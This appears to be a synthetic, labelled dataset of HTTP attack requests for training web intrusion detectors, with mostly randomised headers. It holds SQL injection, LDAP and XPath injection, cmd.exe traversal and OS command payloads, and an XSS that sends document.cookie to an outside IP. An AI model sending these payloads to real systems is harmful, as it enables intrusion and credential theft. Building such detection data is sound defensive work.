Referer: /vowspip/h1usas/Rysfn/gahnl/ilTrl.gz
TE: gzip
Trailer: TE
User-Agent: Mozilla/7.2 (X11; U; Open BSD i586 8.0; ss-oi; rv:5.4.0) Gecko/81713516
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 286x017
Via: HTTP/0.9 64.164.241.183, 7.6 112.188.23.232:86
Transfer-Encoding: gzip
Upgrade: unbL/8.1, luoi/0.0, jgsmeh/0.8
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 16.107.252.123
X-Serial-Number: 736758197053618
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47227
Start - Id: 43575
class: OsCommanding
GET /qnrfivbHmUro/tscqTeieerolU8bas/ISA8/mk@e9-kevalCDNyX/oB1uTbE1eg7_U/a16knMjV6FD/TtqebsoK.js?Kexmlsampv%uA=c9P69Sbkx_&todhsaflf=mail+els%40xcwer5y.eTPccoe.gov++%3C%3C+++++%2Ftmp%2Fwu.c+++++%3B&sdftREaie=0Erjaieo&8y5yen0=vCannrec9 HTTP/1.0
Host: 26.20.6.46
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: fe1t-6hMn
Cache-Control: min-fresh=41
Client-ip: 147.64.54.163
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="95"
Date: Fri, 07 Oct 05 10:09:17 UTC
ETag: "z@VDwv-LBAonIc6"
Expect: nhNcolo
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sun, 25 Jun 06 04:37:30 UTC
If-Unmodified-Since: Mon, 01 May 06 19:54:17 UTC
If-Match: *
If-None-Match: *
If-Range: "wFGwu6f1XA-FIRqrK9c"
Max-Forwards: 6245
MIME-Version: 5.9
Pragma: gn5dym=wVmenor
Authorization: Basic OHV3N2VuczpraXlTdXdybQ==
Range: 08647-744
Referer: http://www.ao0p8eAl.net/tFny/tfwrya7/1c3e.msf
TE: trailers
Trailer: Host
User-Agent: enfnel
UA-CPU: PowerPC
UA-Pixels: 1267x2165
Via: 1.7 www.jmiteo7h.css, 2.4 116.251.164.25, HTTP/5.7 www.otsPhir.htm:059
Transfer-Encoding: compress
----: -----------------------------------------

null

End - Id: 43575
Start - Id: 41798
class: SqlInjection
GET /hAXpasswdncxCfOVO/ohYq5q2pq.C4K/rs/nQN8Aj/jTn2uH35/tGyilY/ZJo18formh5f.png?jtra=osioKtotqdexte&V2Y1RQtelnet=y7r8%27+++UNION+%2F**%2F++SELECT++9eabse+FROM++dba_users+++WHERE++yHQe++like+%27%2525 HTTP/1.0
Host: 85.127.105.197
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eelidols-o;q=0.8, nnBavarS-8yt;q=0.9, d-h;q=0.7, yetetro-seaphh
Cache-Control: IOdsln='ivxlrrt'
Client-ip: 218.44.126.244
Cookie: svaNelkeht=er;nltchk5wrlhh=h;iusb6=ehcidOtn oqs;hi=0;Z8cuw.ercpdocumenthavingEF=9psgOeskns;rxtei=hUp.nJ2-Be
Cookie2: $Version="874"
Date: Mon, 04 Jan 10 23:08:15 UTC
ETag: W/"u-p0upc_i-I_o6YnCF5"
Expect: ytnux=thiRx
From: hwhheI@8isu.ch
If-Modified-Since: Sat, 01 Sep 07 10:06:13 CET
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Aug 08 07:31:05 UTC
Max-Forwards: 5
MIME-Version: 8.5
Pragma: xRv7='Gamw'
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Digest uri=/cAboegm/udmani8e/iicm90.tiff
Range: 82059-
Referer: http://www.dima19ai.it/rfieejn/otuE/neTs/Noel.bin
TE: gzip,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: b0Esicj0ofeto7z5YsA
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7179x1026
Via: nhe/7.9 www.fjmt.tiff, HTTP/5.0 9.97.131.191
Transfer-Encoding: gzip
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 864 www.eeeoa.css "hlrre9anouesreagre4w" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 12063263563674128535
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41798
Start - Id: 42507
class: SqlInjection
GET /ezCaH94X.mdb?tTioog8pgdeAoT=Ni1tiwlUnm7ab2&bhnne4Nn0msoee=%3B+exec+get_cust%28++++%27x%27%27++union++select++++object_name%2Cobject_type%2C%27%27x%27%27+from+++user_objects+++++where+++%27%27ewMdlnzreo%27%27++%3D+++%27%27+++%27+++%29%3B&ep=lqrirmnnstc&w9RoV=6624&t7xlscmurfh=lbq%5D%2B&sqltlat2oe2deb=nh9%5Doni%3D0nieeEtprocessing-instructiono HTTP/1.1
Host: 218.154.224.59
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 59.62.46.157
Cookie: drr=tsde;io=2fe o;wFC0httpse3= tgi6pipr;XexecU_=alnhtndttOECnias;KopassthruUpassthruk@c0=au;szelraoTrry4=667
Cookie2: $Version="85"
Date: Sat, 14 Mar 09 05:56:57 GMT
ETag: "Fhdp4@cKxDHrUkZvfQ"
Expect: meehtt=aoeIha
From: be38Ged@6e9snto.ch
If-Modified-Since: Wed, 30 Mar 05 04:31:40 GMT
If-Unmodified-Since: Mon, 04 Apr 05 18:24:16 UTC
If-Match: "cQUDy1jS.NFiw2Od"
If-None-Match: "IkS3r3@wyXvNo064W"
If-Range: Tue, 02 Sep 08 14:23:54 GMT
Max-Forwards: 60
MIME-Version: 8.8
Pragma: ear='sv'
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: Digest nc=Ccc83D74
Range: 16802-
Referer: http://www.gari5.de/aoys/ieugnht/l9lc/cruwahd/1axerak.msf
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.1 (X11; U; Linux i386 5.4; da-zg; rv:3.3.3) Gecko/21636826
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: HTTP/3.4 91.221.152.198
Transfer-Encoding: gzip
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 504 127.15.72.187:71097 "tehsu6o03" "Sat, 20 Aug 05 24:15:38 GMT"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42507
Start - Id: 44523
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.het3nuLo.uk:590
Connection: close
Accept: text/plain;q=0.6, application/zip
Accept-Charset: gb2312;q=0.1, us-ascii, cp-932
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 108.61.204.42
Cookie: Eadjaliet=e_uqTYYep;errndc9e=nVCKPxQ6OM;geH-RvR9=3567216;tfksitDnieRe=oJZ4kH05-h3
Cookie2: $Version="81"
Date: Fri, 20 Feb 04 02:07:52 GMT
ETag: "6.58tUusJo7_pzi8ZM"
Expect: 100-continue
From: bsntalu@ofn3s.de
If-Modified-Since: Sat, 16 Apr 05 13:06:37 UTC
If-Unmodified-Since: Tue, 22 Feb 05 09:31:00 GMT
If-Match: "OYpkBKwDqtc@BqL"
If-None-Match: "x6gPbxb4VHViK_Zn9"
If-Range: *
Max-Forwards: 89
MIME-Version: 8.5
Pragma: iitshoiw='uae'
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: ienbeh ieerread=snqackgo
Range: 0-753213
Referer: /Dtsi/hsoirt/3ePfjis.cgi
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 6.8; mr-os; rv:1.9.2) Gecko/58998519
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x841
Via: HTTP/0.4 www.ao6Nyb5.tiff, 0.0 201.215.60.37
Transfer-Encoding: gzip
Upgrade: c3oe/1.8, sib/4.3, apenZ/1.3
Warning: 562 www.wrflneb.png "8rklJnrmoonx4" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44523
Start - Id: 37496
class: LdapInjection
GET /etN/Se1hN/at.oZDTajyctVs7f/stnlweoqbhiUMn.htm?iseaCIl4w=nh&nstTezt2iie=acceptaiIk&iYnIbC=R7t&isaNjho=tyBYD4&oh7yhRe1cq=anitonSsbsnrtnat1&vESQZJZL=Eq&edfwpttmEeknw=%7Ebe8&wostmaneutee=odb&ry=enxr&Eeoijubeiehufe1=lo8c0nLwiembdof3ic&adhoa=38 HTTP/1.1
Host: www.nssc2n2rat.uk
Connection: keep-alive
Accept: text/*, image/gif
Accept-Charset: x-mac-roman;q=0.2, x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 202.192.182.170
Cookie: ea35lhodecotn=whereot'twt;iseLtoer2oHrso=03)(&(objectClass=xcf)(|(sn=tdy)(cn=i0    J*));j7T3AoUi7=szaj;dsuhrlc7=9368;uucyreyviex2eo=riA
Cookie2: $Version="818"
Date: Sun, 06 Mar 05 15:38:37 CET
ETag: "t6aX-TmS1_@GpX.ki17"
Expect: eoa3ev=ihHt
From: iyhwr@V7ga.uk
If-Modified-Since: Mon, 23 Aug 04 12:16:09 GMT
If-Unmodified-Since: Sat, 13 Jun 09 14:52:10 CET
If-Match: "WDRy9kOtz4uFnDD17"
If-None-Match: "_qH@sHks0BoWCdhf23"
If-Range: Wed, 23 Jul 08 13:25:30 CET
Max-Forwards: 4556
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: ge0cdo 3Jnsy=TrleeY
Authorization: Basic bGFyY2hsOnRlNHd0NQ==
Range: -073
Referer: /CiNtakht/ibriI7.swf
TE: deflate;q=0.5
Trailer: User-Agent
User-Agent: 8naeeMne/5.4.1.9
UA-OS: Windows NT
Via: 1.3 148.177.241.20:8, FTP/2.2 www.w61adv.shtml
Transfer-Encoding: compress
Warning: 813 www.aje1eeE.tiff:9 "Avrer" 
X-Serial-Number: 5649136594252322056
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37496
Start - Id: 41036
class: SqlInjection
GET /anc3eslo6o8/aeBee/ssbyhao/ptaa5anlyoRstraos/eeteaiixisriesinr/aUl4sKY9qTD09CZ8/lcFWLvkApxliJqwREd/jHZei5/_1tOmeta0jNN.S.cfm?enw=uMmHJKsf-ccR&ahtdnji8h=AGca+tijudH&Hdk=%27%3B++EXEC+++master.dbo.sp_makewebtask+++%27c%3A%5Cinetpub%5Cwwwroot%5CrE.htm%27%2C++++%27SELECT+Ilp++FROM+++dTaarin+WHERE+++xtype%3D%27%27U%27%27%27 HTTP/1.1
Host: 18.155.49.83:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.5, gzip;q=0.8
Accept-Language: ap-uisqrte, dd68a-ai;q=0.2, tpnocdgm-tdaholsO, sei-onotra;q=0.1
Cache-Control: max-stale=93
Client-ip: 206.200.164.185
Cookie: iiEc=e-HKN34A;geyoNie=kJr8;EsuWwfg7iu=lekp;5tn=0274;ENidrm=123013
Cookie2: $Version="688"
Date: Sat, 23 Feb 08 20:09:43 UTC
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: 100-continue
From: nrW4t@rHfmntrl.org
If-Modified-Since: Mon, 17 Apr 06 16:05:47 CET
If-Unmodified-Since: Wed, 21 Jan 04 24:20:37 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 19 Feb 09 16:59:48 CET
Max-Forwards: 18
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 956-40926
Referer: http://ee5s5do.org/riSjF/ielo7us/rnelg1s/eybrurn/4twlni.fgf
TE: chunked;q=0.2,trailers
User-Agent: qbM_I6JLiB http://www.ilyyAs.fr
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6152x736
Via: 3.2 107.11.11.233:8086
Transfer-Encoding: compress
Upgrade: yiihAN/3.0
Warning: 886 225.6.48.99 "n1xne5msKpismeoarx" 
X-Serial-Number: 27676908401
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41036
Start - Id: 44450
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.e7oLn4h.fr:80
Connection: esacft
Accept: text/*, application/*;q=0.0
Accept-Charset: euc-jp;q=0.6, x-mac-cyrillic, windows-1255
Accept-Encoding: 
Accept-Language: ees-nd0irrh, tnigtye-e, sTbfn-hUr, raA-rae
Cache-Control: only-if-cached
Client-ip: 241.65.49.103
Cookie: te=491;Abkw=17
Cookie2: $Version="65"
Date: Thu, 25 Oct 07 23:03:58 CET
ETag: W/"CA.F4LqzUCGLA1Nk"
Expect: Takeh8r
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Tue, 17 Aug 04 12:13:40 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: "Mw5GdpOs-pGMaGM-"
If-None-Match: "vd@v72lWk_URFAico6d"
If-Range: *
Max-Forwards: 4189
MIME-Version: 1.4
Pragma: h='t3tomb'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Basic d3JjTHplNnI6Z241c25l
Range: 6-02287,72753-
Referer: http://www.tznudacw.cz/ia29itai/eTq0.aspx
TE: chunked,deflate,deflate
Trailer: Expect
User-Agent: lki7d/9.4.7
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/1.2 103.185.139.157
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 0.187.253.54
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44450
Start - Id: 37964
class: LdapInjection
GET /r7hy4VU_h2m/a9ecdoa1y582si8tpnoo/JCX6xSPmat/.Fldf/4gieri8tmhuek7jrl/hsm7l9Tnvt/sFpXUxBeTHV./CSUO.SandX.bin6j4Q3/nRS-Ea.IRxfW_b/eclsco/gzkv2y@LM/st.jpeg?i9ebnazfsw9sooW=f7e01sef7i&8eemeRe=4uwlK&eobadn3Sd=xp2SkN7O6BzW&3H3vX=%29++++%28+++%7C+%28Eki%3Des*%29&taelsymo5teh=35290&iolaootb3y=242593 HTTP/1.0
Host: www.aohwa0joey.cz:658
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-ce;q=0.0
Accept-Encoding: 
Accept-Language: ser-3iia4e;q=0.9, haixiela-ipE5, n-etyccs;q=0.4
Cache-Control: only-if-cached
Client-ip: 177.141.172.83
Cookie: spdoHs=4;bn=66106;e3lcjeftcg=ytOK5
Cookie2: $Version="12"
Date: Fri, 08 Feb 08 23:43:00 UTC
ETag: W/"YvR34eAtguoggS-"
Expect: 100-continue
From: ob6jr0@oucA7niAri.it
If-Modified-Since: Sat, 15 Jan 05 17:55:44 GMT
If-Unmodified-Since: Fri, 30 Sep 05 08:11:49 GMT
If-Match: "Zd.LX6.txXMsGynC"
If-None-Match: *
If-Range: "HHGLgH@t25Ogq-B"
Max-Forwards: 928
MIME-Version: 8.4
Pragma: upmui=a3yvt
Proxy-Authorization: Digest qop=auth
Authorization: NTLM UmV0aGlwb3Jzc2VpYWxyaTNpb2ltRW1PYTdxZXRwbmRHbWU4Ng==
Range: -8,482604-
Referer: /ptzdryst/eafeufpd/eldt1h/eu5kgg/EgL0r.php4
TE: chunked,trailers
Trailer: Warning
User-Agent: Mozilla/5.0 (Windows; U; Win98 6.2; al-ws; rv:7.3.3) Gecko/77232263
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 6.4 www.u9ig.gif, 8.1 www.osrte.png, 3.9 110.173.46.242
Transfer-Encoding: identity
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37964
Start - Id: 41509
class: SqlInjection
POST /Rac4h8T62ia/ymebu1nye6d/enhd61w/nm31r/iNeVvlA@LC/Bp9vk_-VlJN4/cER4i7esaos1trot.html? HTTP/1.0
Content-Length: 386
Content-Language: zse,ar9oe,iEttpu
Content-Encoding: compress
Content-Location: /1eheeaya/6Evou3.pdf
Content-MD5: OEhpdG1lZGluYkFlbWRpaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Mar 05 21:06:08 UTC
Last-Modified: Sat, 31 Oct 09 23:54:48 CET
Host: www.e4oj.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, compress
Accept-Language: *
Cache-Control: max-age=183
Client-ip: 3.29.1.103
Cookie: h0tc=eemmeamf5md;esomlhIg3yleee=np_;dh=neHcPJto
Cookie2: $Version="3"
Date: Tue, 30 May 06 02:41:07 UTC
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Wed, 27 Feb 08 18:13:01 GMT
If-Unmodified-Since: Mon, 11 Jun 07 15:18:59 UTC
If-Match: *
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: *
Max-Forwards: 1
MIME-Version: 9.8
Pragma: tRtc9iaa='enssm'
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: Basic YWVlVGhob206cmllZXNpMg==
Range: 229-94,-0,-455
Referer: http://ntcye37.gov/n6ot/eardih.cfm
TE: gzip,chunked
Trailer: User-Agent
User-Agent: er51tgpx6 http://www.esbOesaS.org
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: 3.9 www.ng5nlt.tiff, 3ti/0.5 www.xniunjck.shtml, Dsrcq/7.8 www.iemr.html
Transfer-Encoding: deflate
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0olr=hiivbiyhynrt&1agxnDecv2a0qat=T4t&IwgetlMs=eufhi0gena&idn='  OR     'dbpema'     >    'S&taixcbmieasis3d=plcpasswduy toijn~h]netcatji)t&aehncjradrrp9=t the&t9eamdkt=ht;ed&Xnt4de=le>oht insertgiic&e+>d&tc9tetweho=d:ey&toe=092&kt2mlroetw=19868&tluKsrkrp3du=p<i ~ne@netcatitn81&elebsl=952130458&bOnaalsl=+mehomeurc2rieX\as&ygMtmeenahqtpCN=dotCMngt

End - Id: 41509
Start - Id: 41950
class: SqlInjection
GET /Latd8s7lkhohiuS/sUwDS0/DJ/twupR1eqv.p4ss/yCandnEqyZpS5M.js?bgsaye=ean+&asrmomzhvvy=+&vSWc_9_3PK=oi&lhsxac8RnR=Aatho&ircten=%27++OR+++%27raeT%27++%3E+%27S&lse6dbbeDrluib=aXtl&ooeclt=lcnsoo HTTP/1.1
Host: 247.95.16.60
Connection: keep-alive
Accept: video/*;q=0.6, application/*;q=0.9
Accept-Charset: cp-950, euc-kr, utf-7;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 152.104.66.182
Cookie: oeftrraa=e7aa2;aei=lsnL;afa5iraNdeulnf=jjw9husP;KWOZPservicesZ=pT0F73FvQo;etrtAefgetieZta=091065
Cookie2: $Version="26"
Date: Thu, 24 Feb 05 06:52:02 GMT
ETag: "XjhBWitXvwno9RjalU4c"
Expect: aeeedy
From: 7n10udti@ds4gh.org
If-Modified-Since: Fri, 17 Apr 09 02:17:04 GMT
If-Unmodified-Since: Sun, 03 Jan 10 23:00:03 CET
If-Match: "17TFthoL57FowJl9Y"
If-None-Match: "5ZlG8oNFpAZ5Ob3hF"
If-Range: Tue, 09 Nov 04 07:09:35 UTC
Max-Forwards: 9151
MIME-Version: 6.3
Pragma: taunjemm='O'
Proxy-Authorization: Basic MW5lYW1OdG46YXN0bHRlbnI=
Authorization: auke5a u3wlMny=Rniuts
Range: 55660-
Referer: http://www.otsO.ch/pe2omOya/mcaCn/ittouqe.jsp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: IlSgiirL
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: identity
Upgrade: imn/2.9
Warning: 021 www.mcyot.gif "hrtenvrrnpri" 
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 41242078999326437
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41950
Start - Id: 47882
class: XSS
GET /yd5gtetsoeOh/eS6KQJ3@WC5BiWx0/NeGwindow.open.LGnK-8/qypJK55Hto/r5uodD@/aP/hl52GgZ/slet9Oehsaee6n7eH/hh/dWVvn2in/as/tD2CzSbuI5mOq.php?tU9iQYSq=8168&hm5o=hefq&mkudpm=on&ndBJ=ZsaIe&SI4TVKFxRu0=ws%26%3E&otHoeesvawfDs=587704&eenr=scw+ho&aa9locdosr=%3Cdiv+++style++%3D%22++++behaviour%3A+++++url%28%5Bhttp%3A%2F%2Fwww.veorreri.com%2Fscript%2FoaepCtn.mspx%5D%29%3B++%22%3E&euhmair2avogbxy=htaccesnobject8gt&e8ilou=vud%24%3Bh&anhri=senuy3aseTtrt5mJ&sveaAO=fguregCapsyp1u5ql&soSaanshtl=hlinkn0fcha%3At HTTP/1.1
Host: 16.232.251.89
Connection: close
Accept: application/postscript;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 85.234.191.196
Cookie: 9stVrY=93892
Cookie2: $Version="49"
Date: Sun, 12 Apr 09 05:31:58 GMT
ETag: "akDYjrMMwhr7w8IY8-9I"
Expect: 100-continue
From: briu78@sotkdsg.de
If-Modified-Since: Mon, 14 Dec 09 07:37:21 CET
If-Unmodified-Since: Fri, 09 Mar 07 24:38:40 CET
If-Match: "1Mqhh3gYZC5sv7k"
If-None-Match: "pk5-mkIfox.3wj9.o"
If-Range: Fri, 20 Jan 06 03:29:16 CET
Max-Forwards: 27
MIME-Version: 2.7
Pragma: eeilXqap='Hc8keosg'
Proxy-Authorization: Digest qop=auth
Authorization: Basic c2dqaTo3c29t
Range: 064-,-6198,422476-
Referer: /tmotlu/RenAPqs/xaleh6ii/tyejBOhs/gs4etnr.pl
TE: chunked
Trailer: Accept
User-Agent: AMhtho4yaofbD6
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: 5.2 238.141.45.126, 2.3 182.78.149.95, 2.4 216.7.36.205:57
Transfer-Encoding: compress
Upgrade: dglC/5.9, mee/7.3, oitlI/6.9, acmtu/7.6
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47882
Start - Id: 47017
class: XSS
GET /QN8OIy5vos/99M.7At_/1BjvwpIj62GZQfr1.js?hDab=11&weevdt=51670&n96Eb3nlr4ze=%3Cxml++++id+++%3D++%22++X++++%22+++%3E%3Ca+++%3E%3Cb++%3E%26lt%3Bscript%3E%5Bwindow.open%28%27http%3A%2F%2F28.188.225.26%2Fieolna.asmx%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+++%3E%3B%3C%2Fb+%3E%3C%2Fa+%3E%3C%2Fxml+%3E HTTP/1.1
Host: www.pf2aiiede.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5;q=0.8, cp-950, euc-tw;q=0.6
Accept-Encoding: deflate;q=0.0, identity
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 18.81.58.217
Cookie: qds0w=iuweavlarhfb
Cookie2: $Version="3"
Date: Thu, 28 Feb 08 02:08:31 GMT
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: Desiah@eghc.be
If-Modified-Since: Fri, 09 Apr 10 12:49:02 GMT
If-Unmodified-Since: Thu, 01 Feb 07 23:38:35 UTC
If-Match: *
If-None-Match: "uVTHARtNL_cVo4-YO"
If-Range: "-2P_0EwNfj_245RR8"
Max-Forwards: 9
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWV0YmV0Mm9iQW9DOGd5TmV4U3R4bXRZNnNhbGRlaG9Wdmk=
Authorization: Digest algorithm=rk8ftoe
Range: 5-22964
Referer: http://www.uwiwhya8.de/uo927teo/m1n6e9s/fbqOd6ku.png
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.8 (X11; U; Open BSD i586 9.9; Sg-am; rv:6.6.3) Gecko/38211103
UA-CPU: Sparc
UA-Disp: 128,634,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7231x6416
Via: enu7/8.3 40.116.44.167
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 523 www.sioteo.shtml:61 "e4ipraamice7" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 239527167
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47017
Start - Id: 41349
class: SqlInjection
GET /9alzeHeEkbAwdfNfS/ozyrJHD/lTgX0g_ni_v/mshaatelks4n/tGHd-mo/qE9ZSjOc/qtPaeee/hpS2SZ7L7/fasahcaoNl/ihroonanql74bW2t2/gamoao/rti2EunrlytOafc8ao.swf? HTTP/1.0
Host: www.aitowemh.gov:20
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Cache-Control: max-stale
Cookie: hsoaxrh8rlc=tJP77rZZ;ihptrr4lrNh2s4=r|s;mhScyct=wamts2ebednaesh;Beqi='    /**/     OR   /**/     'Anlaq'     >   'S;saoei5sinlaror=95
Cookie2: $Version="23"
Date: Sun, 06 May 07 13:26:08 UTC
ETag: "7VXuL-daHv4H3A9i@VK"
If-Modified-Since: Sun, 29 Aug 04 01:42:31 CET
Pragma: tarcrWeq=o
Referer: http://hOenjri.net/Asoddp/ehUeqiew/eefpej2n/titlsow/tEnOe.doc
TE: trailers
User-Agent: tIqa3ancr (d0iaapaZ; jQQ0Vxb; eSFrtyG; tN2eHc; ehsf0D9t)
Via: HTTP/4.4 www.dtrelear.tiff
X-Forwarded-For: 132.157.37.60
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 41349
Start - Id: 48522
class: XPathInjection
POST /hmnwBniraldneTo1nse/e34u.css? HTTP/1.0
Content-Length: 298
Content-Language: yjldueDa,ehec5
Content-Encoding: identity
Content-Location: /6foist5/2beir/telvui.nsf
Content-MD5: bWFzcnRIbXRhZzhlZmVvNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Mar 08 24:43:36 GMT
Last-Modified: Fri, 24 Oct 08 19:53:13 UTC
Host: 177.21.117.137
Connection: keep-alive
Accept: application/*;q=0.1, image/*;q=0.7
Accept-Charset: cp-936;q=0.5, iso-2022-jp;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: qi3nDtie-aicaqiin
Cache-Control: no-cache
Client-ip: 221.85.134.126
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="5"
Date: Wed, 09 Mar 05 16:53:44 UTC
ETag: W/"DH_rMCDx8@tWH@v-"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Fri, 22 Jul 05 01:47:06 UTC
If-Unmodified-Since: Thu, 14 Apr 05 11:42:10 UTC
If-Match: *
If-None-Match: "maUElsYH51PTTjJhGFUz"
If-Range: Sun, 03 Jun 07 13:56:17 CET
Max-Forwards: 92
MIME-Version: 0.8
Pragma: cfAec=y
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: dLedL1 9at7e=pu3pp5
Range: -97671,976035-235370,9-723
Referer: http://h7hl.ch/ngdIe/ehlji.mp3
